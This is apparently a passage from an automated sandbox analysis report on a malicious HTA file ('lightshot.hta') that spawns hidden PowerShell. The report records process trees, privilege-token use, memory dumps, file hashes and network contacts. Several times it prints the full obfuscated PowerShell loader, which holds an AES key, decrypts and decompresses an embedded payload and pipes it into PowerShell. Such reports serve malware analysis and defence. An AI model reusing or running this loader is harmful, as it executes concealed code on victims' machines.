uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -

Network

N/A

Files

memory/2416-2-0x0000000072250000-0x00000000727FB000-memory.dmp

memory/2416-3-0x0000000072250000-0x00000000727FB000-memory.dmp

memory/2416-4-0x00000000026F0000-0x0000000002730000-memory.dmp

memory/2416-5-0x00000000026F0000-0x0000000002730000-memory.dmp

memory/2416-6-0x0000000072250000-0x00000000727FB000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 946a7636a5f35163fb6100aeca1b989a
SHA1 6c6243f68820cdda9cd92d49cfadd0866732983c
SHA256 ae3453c8377ed232dc8322f88c7f5cf78a411de8e72c6dc22705675fcafefdc5
SHA512 1a6027ad1cd889a502788ecc8277310e86e1be810124e4977a609b573b4574502be87906eb0649c757a2102c7563efb3b14563cf6c4b1a9fc448734ba691f26b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BTVKK3BKSRZFWS4OKQ3G.temp

MD5 946a7636a5f35163fb6100aeca1b989a
SHA1 6c6243f68820cdda9cd92d49cfadd0866732983c
SHA256 ae3453c8377ed232dc8322f88c7f5cf78a411de8e72c6dc22705675fcafefdc5
SHA512 1a6027ad1cd889a502788ecc8277310e86e1be810124e4977a609b573b4574502be87906eb0649c757a2102c7563efb3b14563cf6c4b1a9fc448734ba691f26b

memory/2752-17-0x0000000071BF0000-0x000000007219B000-memory.dmp

memory/2752-20-0x0000000002760000-0x00000000027A0000-memory.dmp

memory/2752-23-0x0000000071BF0000-0x000000007219B000-memory.dmp

memory/2272-26-0x0000000002090000-0x00000000020D0000-memory.dmp

memory/2272-30-0x0000000071BF0000-0x000000007219B000-memory.dmp

memory/2752-31-0x0000000071BF0000-0x000000007219B000-memory.dmp

memory/2272-32-0x0000000071BF0000-0x000000007219B000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2023-12-01 18:16

Reported

2023-12-01 18:19

Platform

win10v2004-20231127-en

Max time kernel

91s

Max time network

118s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\lightshot.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3624 wrote to memory of 4300 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 4300 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 4300 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4300 wrote to memory of 2816 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4300 wrote to memory of 2816 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4300 wrote to memory of 2816 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 1512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\lightshot.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell - }

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
EE 185.123.53.208:80 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 218.240.110.104.in-addr.arpa udp
EE 185.123.53.208:80 tcp
US 8.8.8.8:53 193.78.101.95.in-addr.arpa udp

Files

memory/4300-0-0x0000000002AC0000-0x0000000002AF6000-memory.dmp

memory/4300-1-0x0000000071830000-0x0000000071FE0000-memory.dmp

memory/4300-2-0x0000000002B30000-0x0000000002B40000-memory.dmp

memory/4300-3-0x0000000005550000-0x0000000005B78000-memory.dmp

memory/4300-4-0x0000000005450000-0x0000000005472000-memory.dmp

memory/4300-5-0x0000000005D30000-0x0000000005D96000-memory.dmp

memory/4300-6-0x0000000005DA0000-0x0000000005E06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tml2yce1.lj4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4300-16-0x0000000005F20000-0x0000000006274000-memory.dmp

memory/4300-17-0x0000000006410000-0x000000000642E000-memory.dmp

memory/4300-18-0x00000000064B0000-0x00000000064FC000-memory.dmp

memory/4300-19-0x0000000002B30000-0x0000000002B40000-memory.dmp

memory/4300-20-0x00000000076E0000-0x0000000007776000-memory.dmp

memory/4300-21-0x00000000068B0000-0x00000000068CA000-memory.dmp

memory/4300-22-0x0000000006930000-0x0000000006952000-memory.dmp

memory/4300-23-0x0000000007D30000-0x00000000082D4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 def65711d78669d7f8e69313be4acf2e
SHA1 6522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256 aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA512 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

memory/1512-27-0x0000000071830000-0x0000000071FE0000-memory.dmp

memory/4300-28-0x0000000071830000-0x0000000071FE0000-memory.dmp

memory/3224-29-0x0000000071830000-0x0000000071FE0000-memory.dmp

memory/3224-31-0x0000000002080000-0x0000000002090000-memory.dmp

memory/1512-30-0x0000000002FF0000-0x0000000003000000-memory.dmp

memory/1512-32-0x0000000002FF0000-0x0000000003000000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 360a15f45a9e5bdf1251023a6b1df0ea
SHA1 d6a3643b8ebb2dc29b51d259bdf270ddaa7d6c18
SHA256 acc0e3dfaea599f208571597633c7f1b0647fa3d315910fcf2243f2a9b812190
